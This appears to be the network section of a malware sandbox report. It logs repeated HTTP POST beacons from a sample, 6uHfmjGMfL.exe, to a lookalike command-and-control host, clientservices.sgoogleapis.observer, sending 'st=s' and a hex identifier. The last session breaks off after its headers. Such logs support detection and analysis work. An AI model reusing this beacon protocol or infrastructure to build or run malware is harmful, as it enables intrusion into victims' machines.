              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              0192.168.2.549704104.21.80.1803868C:\Users\user\Desktop\6uHfmjGMfL.exe
              TimestampBytes transferredDirectionData
              Jan 8, 2025 08:43:56.091411114 CET172OUTPOST /api/index.php HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              Host: clientservices.sgoogleapis.observer
              Content-Length: 4
              Cache-Control: no-cache
              Data Raw: 73 74 3d 73
              Data Ascii: st=s
              Jan 8, 2025 08:43:56.733007908 CET817INHTTP/1.1 200 OK
              Date: Wed, 08 Jan 2025 07:43:56 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              cf-cache-status: DYNAMIC
              vary: accept-encoding
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=A7KEOBbeh88yURHOW2Ie2KBvkXUgJljd8kzZ4nrYnbftKZrKwqWdqnEcVXwJZQDF0HP8iC9kNMiZmF4myB%2BqedBllfuBbcnHhRAmiZSY2L%2BGQs3p%2F1lFUVUSgRTL6KwODXB7QcHDHnPxber%2FzyaK7nO6UMTafw%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8fea8f3a1e25c443-EWR
              server-timing: cfL4;desc="?proto=TCP&rtt=1530&min_rtt=1530&rtt_var=765&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=172&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 1 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              1192.168.2.549705104.21.80.1803868C:\Users\user\Desktop\6uHfmjGMfL.exe
              TimestampBytes transferredDirectionData
              Jan 8, 2025 08:43:58.246392965 CET326OUTPOST /api/index.php HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              Host: clientservices.sgoogleapis.observer
              Content-Length: 156
              Cache-Control: no-cache
              Data Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31
              Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
              Jan 8, 2025 08:43:58.904522896 CET824INHTTP/1.1 200 OK
              Date: Wed, 08 Jan 2025 07:43:58 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              cf-cache-status: DYNAMIC
              vary: accept-encoding
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2dKIE86aOMKaG1%2FanKndbIWr9RadBh3dxrH%2Fe3BvXN%2BTwhmWVh1SdcHjKuKYfhAXMXtgA2diwgBK4zE03AsyJi3NgWgGaKQI3BFjJYMFJ2AcafxJZKqfJ6hDb7GkLuiSSm24a4ptdL%2BIs3saCnFGQepzgrSuEQ%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8fea8f47afe87d0e-EWR
              server-timing: cfL4;desc="?proto=TCP&rtt=2029&min_rtt=2029&rtt_var=1014&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=326&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 7 <c><d>0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              2192.168.2.549706104.21.80.1803868C:\Users\user\Desktop\6uHfmjGMfL.exe
              TimestampBytes transferredDirectionData
              Jan 8, 2025 08:44:00.527575016 CET172OUTPOST /api/index.php HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              Host: clientservices.sgoogleapis.observer
              Content-Length: 4
              Cache-Control: no-cache
              Data Raw: 73 74 3d 73
              Data Ascii: st=s
              Jan 8, 2025 08:44:01.172691107 CET819INHTTP/1.1 200 OK
              Date: Wed, 08 Jan 2025 07:44:01 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              cf-cache-status: DYNAMIC
              vary: accept-encoding
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uWIyo%2BNfh3zctzEohbv9SrVrr%2FvEWT07AW6LWeIjIafIBM3vp61xMHWXduClkZ5r7ZII%2Fyer359THYZn0l3%2F5FX4Kzb8YwsPosn1eUPc8OIXI6G1zn8dIz3rUtzKNxf09nMkl2NYh%2Bcz8pyZ2wjS9ZINLB4gdA%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8fea8f55eb317d0e-EWR
              server-timing: cfL4;desc="?proto=TCP&rtt=1955&min_rtt=1955&rtt_var=977&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=172&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 1 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              3192.168.2.549707104.21.80.1803868C:\Users\user\Desktop\6uHfmjGMfL.exe
              TimestampBytes transferredDirectionData
              Jan 8, 2025 08:44:02.683852911 CET326OUTPOST /api/index.php HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              Host: clientservices.sgoogleapis.observer
              Content-Length: 156
              Cache-Control: no-cache
              Data Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31
              Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
              Jan 8, 2025 08:44:03.345909119 CET821INHTTP/1.1 200 OK
              Date: Wed, 08 Jan 2025 07:44:03 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              cf-cache-status: DYNAMIC
              vary: accept-encoding
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CDOFtEFmaRxuvKMnBVhwVU1C3rb6MkjpGknBqc8IFtC5yAk1NvcOViGptI78drMgGyeM%2BcvrOu0eV%2BCj4%2BTIyRNx4ZwtgnAWQ0rXlOfKYTx9nYuN20zs0YO8RmWJI7rF97ZzC0mI13z2sCExVbgekg1pezdngA%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8fea8f636f5b42d2-EWR
              server-timing: cfL4;desc="?proto=TCP&rtt=1562&min_rtt=1562&rtt_var=781&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=326&delivery_rate=0&cwnd=227&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 7 <c><d>0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              4192.168.2.549708104.21.80.1803868C:\Users\user\Desktop\6uHfmjGMfL.exe
              TimestampBytes transferredDirectionData
              Jan 8, 2025 08:44:04.984251976 CET172OUTPOST /api/index.php HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              Host: clientservices.sgoogleapis.observer
              Content-Length: 4
              Cache-Control: no-cache
              Data Raw: 73 74 3d 73
              Data Ascii: st=s
              Jan 8, 2025 08:44:05.633984089 CET810INHTTP/1.1 200 OK
              Date: Wed, 08 Jan 2025 07:44:05 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              cf-cache-status: DYNAMIC
              vary: accept-encoding
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AByX4fAT6GmNnOko7BW7pVAC3jW3fagkZojyUGLTpTf1P0O25nkR85c6iREyn1sRw8z65YqT6Yawsh8eGcn5ElGRjlZ4ePYIvDTuJ1fCYeN4LonZN00tNUqjCzTVz9yajP2NP97J9InDHU0Tk5pktBqyda0RIg%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8fea8f71bc0a8c0f-EWR
              server-timing: cfL4;desc="?proto=TCP&rtt=2003&min_rtt=2003&rtt_var=1001&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=172&delivery_rate=0&cwnd=221&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 1 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              5192.168.2.549709104.21.80.1803868C:\Users\user\Desktop\6uHfmjGMfL.exe
              TimestampBytes transferredDirectionData
              Jan 8, 2025 08:44:07.159228086 CET326OUTPOST /api/index.php HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              Host: clientservices.sgoogleapis.observer
              Content-Length: 156
              Cache-Control: no-cache
              Data Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31
              Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
              Jan 8, 2025 08:44:07.822917938 CET823INHTTP/1.1 200 OK
              Date: Wed, 08 Jan 2025 07:44:07 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              cf-cache-status: DYNAMIC
              vary: accept-encoding
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XS%2FsuIyJmf9aUnvZp9mtYuTK3LBE%2BheeBkIrKOqteo7CKy4kMCZhgZEsFHO2rjQ22gHgJccrdr0A01ufQZP0HR9jHuzEbT08BUX99IccfmwO7V9bzlk9V%2FeOBpAtK7gWp%2BHT0ojtyuNynNVUic4UBoMIubVC9Q%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8fea8f7f58b9c443-EWR
              server-timing: cfL4;desc="?proto=TCP&rtt=1609&min_rtt=1609&rtt_var=804&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=326&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 7 <c><d>0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              6192.168.2.549710104.21.80.1803868C:\Users\user\Desktop\6uHfmjGMfL.exe
              TimestampBytes transferredDirectionData
              Jan 8, 2025 08:44:09.451776028 CET172OUTPOST /api/index.php HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              Host: clientservices.sgoogleapis.observer
              Content-Length: 4
              Cache-Control: no-cache
              Data Raw: 73 74 3d 73
              Data Ascii: st=s
              Jan 8, 2025 08:44:10.073746920 CET823INHTTP/1.1 200 OK
              Date: Wed, 08 Jan 2025 07:44:10 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              cf-cache-status: DYNAMIC
              vary: accept-encoding
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aOSXYuBgRLbySnmBC6gKbUhPEh%2F85VcJnTGI4Q8qLd3nmCvjto%2BqxzMiTg3yst8Vi9vsayX1R10BxbDmBYe41PCqhxbnfh0t%2B4DgNABjddAzoaKRHUNgVXbl3sq%2BTe62y%2Bw%2B9LVqXD0oPi5wK1vi8Sjp9%2BCfWA%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8fea8f8d9ca142d2-EWR
              server-timing: cfL4;desc="?proto=TCP&rtt=1558&min_rtt=1558&rtt_var=779&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=172&delivery_rate=0&cwnd=227&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 1 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              7192.168.2.549711104.21.80.1803868C:\Users\user\Desktop\6uHfmjGMfL.exe
              TimestampBytes transferredDirectionData
              Jan 8, 2025 08:44:11.590373993 CET326OUTPOST /api/index.php HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              Host: clientservices.sgoogleapis.observer
              Content-Length: 156
              Cache-Control: no-cache
              Data Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31
              Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
              Jan 8, 2025 08:44:12.233028889 CET821INHTTP/1.1 200 OK
              Date: Wed, 08 Jan 2025 07:44:12 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              cf-cache-status: DYNAMIC
              vary: accept-encoding
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=P1H87wqruF1Ty2qPlnTCFkaJkKVmuCltOn6YHjK1TgHw%2F1WSk3ciMgROMVUQRySUyc4b7taXFgQW%2BAta6999Xbkigqqygx%2BAilVwI2VDZUyoZrTnsrL9Uq2NnQu9PuZCV9nuDMxjSMJPSrO41s4aE5TD3IA88g%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8fea8f9afaf40f36-EWR
              server-timing: cfL4;desc="?proto=TCP&rtt=1460&min_rtt=1460&rtt_var=730&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=326&delivery_rate=0&cwnd=229&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 7 <c><d>0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              8192.168.2.549716104.21.80.1803868C:\Users\user\Desktop\6uHfmjGMfL.exe
              TimestampBytes transferredDirectionData
              Jan 8, 2025 08:44:14.074604988 CET172OUTPOST /api/index.php HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              Host: clientservices.sgoogleapis.observer
              Content-Length: 4
              Cache-Control: no-cache
              Data Raw: 73 74 3d 73
              Data Ascii: st=s
              Jan 8, 2025 08:44:14.698978901 CET813INHTTP/1.1 200 OK
              Date: Wed, 08 Jan 2025 07:44:14 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              cf-cache-status: DYNAMIC
              vary: accept-encoding
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TS7INSBu9vFAbAEpudukE%2BvekWQZUE63NGSKiYyqP8aGdtXzmAhSNZpgFxSiE7buGMitXY6rjdrziKgJMDxoWeOvl97TIMYrsi3CyIzeSP0zAmspUkYMemLJMyfH1H8XBPxpvpwp4%2BgsfKWGZXnVSd9cEPzm2w%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8fea8faa7db242d2-EWR
              server-timing: cfL4;desc="?proto=TCP&rtt=1564&min_rtt=1564&rtt_var=782&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=172&delivery_rate=0&cwnd=227&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 1 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              9192.168.2.549719104.21.80.1803868C:\Users\user\Desktop\6uHfmjGMfL.exe
              TimestampBytes transferredDirectionData
              Jan 8, 2025 08:44:16.217458963 CET326OUTPOST /api/index.php HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              Host: clientservices.sgoogleapis.observer
              Content-Length: 156
              Cache-Control: no-cache
              Data Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31
              Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
              Jan 8, 2025 08:44:16.848417997 CET831INHTTP/1.1 200 OK
              Date: Wed, 08 Jan 2025 07:44:16 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              cf-cache-status: DYNAMIC
              vary: accept-encoding
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=I3wjccifbJkRom35YKHfKq1l40xDuoBvYtlVk%2FGLKBtmrKnry4196U%2FS8ImfLDgBHs82PwU3mV9b%2Fn0%2BJ%2BmYcfzkvP%2BRGTMI1FvEqqPHXAyI5PrmKZK%2BjYPp5ag8IdSYnCLeN2Sc8IB7fea%2FvLkI5tImcH2mnQ%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8fea8fb7de987d0e-EWR
              server-timing: cfL4;desc="?proto=TCP&rtt=1981&min_rtt=1981&rtt_var=990&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=326&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 7 <c><d>0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              10192.168.2.549733104.21.80.1803868C:\Users\user\Desktop\6uHfmjGMfL.exe
              TimestampBytes transferredDirectionData
              Jan 8, 2025 08:44:18.480537891 CET172OUTPOST /api/index.php HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              Host: clientservices.sgoogleapis.observer
              Content-Length: 4
              Cache-Control: no-cache
              Data Raw: 73 74 3d 73
              Data Ascii: st=s
              Jan 8, 2025 08:44:19.118756056 CET811INHTTP/1.1 200 OK
              Date: Wed, 08 Jan 2025 07:44:19 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              cf-cache-status: DYNAMIC
              vary: accept-encoding
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6Qke7oxSH0fuYD8W%2B7cDxhotgpXnB4mjVuA73w9oQUWN2KLuiNA0JB0SG0U0ddtzvgxc5DuLjXXV1c0YB3uAdS8Quwohe0A7uGuHuk0tWzlZxlECgH9REmhbYq650RuXk8H5oH8Y5x8qymLMFSq8vhXKoetmOQ%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8fea8fc6190f7d0e-EWR
              server-timing: cfL4;desc="?proto=TCP&rtt=1981&min_rtt=1981&rtt_var=990&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=172&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 1 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              11192.168.2.549749104.21.80.1803868C:\Users\user\Desktop\6uHfmjGMfL.exe
              TimestampBytes transferredDirectionData
              Jan 8, 2025 08:44:20.636873007 CET326OUTPOST /api/index.php HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              Host: clientservices.sgoogleapis.observer
              Content-Length: 156
              Cache-Control: no-cache
              Data Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31
              Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
              Jan 8, 2025 08:44:21.200469017 CET825INHTTP/1.1 200 OK
              Date: Wed, 08 Jan 2025 07:44:21 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              cf-cache-status: DYNAMIC
              vary: accept-encoding
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iimtd6qGPUlxSGyHouimUdT03q3MVp%2FHSEkbp2e44WKy2j04%2BYbL8sx1M1qFHTUqYfFrkbg4Lu52HGruVDUM2qyGgu3aK%2FQSdfdzVY3DPRs2%2BmuuWjfwFhe98Ch8qHoMsUyA33qhqr%2FeEL9uWMGWcm9fJAQ6Ow%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8fea8fd39ebcc443-EWR
              server-timing: cfL4;desc="?proto=TCP&rtt=1622&min_rtt=1622&rtt_var=811&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=326&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 7 <c><d>0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              12192.168.2.549765104.21.80.1803868C:\Users\user\Desktop\6uHfmjGMfL.exe
              TimestampBytes transferredDirectionData
              Jan 8, 2025 08:44:22.826100111 CET172OUTPOST /api/index.php HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              Host: clientservices.sgoogleapis.observer
              Content-Length: 4
              Cache-Control: no-cache
              Data Raw: 73 74 3d 73
              Data Ascii: st=s
              Jan 8, 2025 08:44:23.472223997 CET819INHTTP/1.1 200 OK
              Date: Wed, 08 Jan 2025 07:44:23 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              cf-cache-status: DYNAMIC
              vary: accept-encoding
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RMqU74Gdsx5mGfKjzElSuVf%2Bu4ETCv363OqnahcAorq90tHTLO6JSjYkBTDOXF9GKBBn95MS%2BxPxyGNUAVn%2B0dqiRQMItnDeboDV7%2BCO%2BSm1tO3BiOyRSkU0dHXwQU9xaa9audMfjLxn8W0iy4rSFJ9Lj7SOzw%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8fea8fe13c5043ee-EWR
              server-timing: cfL4;desc="?proto=TCP&rtt=1718&min_rtt=1718&rtt_var=859&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=172&delivery_rate=0&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 1 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              13192.168.2.549776104.21.80.1803868C:\Users\user\Desktop\6uHfmjGMfL.exe
              TimestampBytes transferredDirectionData
              Jan 8, 2025 08:44:24.981040001 CET326OUTPOST /api/index.php HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              Host: clientservices.sgoogleapis.observer
              Content-Length: 156
              Cache-Control: no-cache
              Data Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31
              Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
              Jan 8, 2025 08:44:25.612215996 CET825INHTTP/1.1 200 OK
              Date: Wed, 08 Jan 2025 07:44:25 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              cf-cache-status: DYNAMIC
              vary: accept-encoding
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YALzIHvDuLYBJrgQ6Dd3Zvfh2FGegCufxFpWuVdo%2BzMykbzthBgtVcBX0Htun%2BJz82an4iZ5kKlfj9nt9vVRf1%2F53ta%2BigrwJMxUQnvcusIBmT7SsXiiUzmGSXDb3Hn4uf%2B95v4UO3wZdYjKJx9mMF2PTjFBiQ%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8fea8feeaf6f8c0f-EWR
              server-timing: cfL4;desc="?proto=TCP&rtt=1941&min_rtt=1941&rtt_var=970&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=326&delivery_rate=0&cwnd=221&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
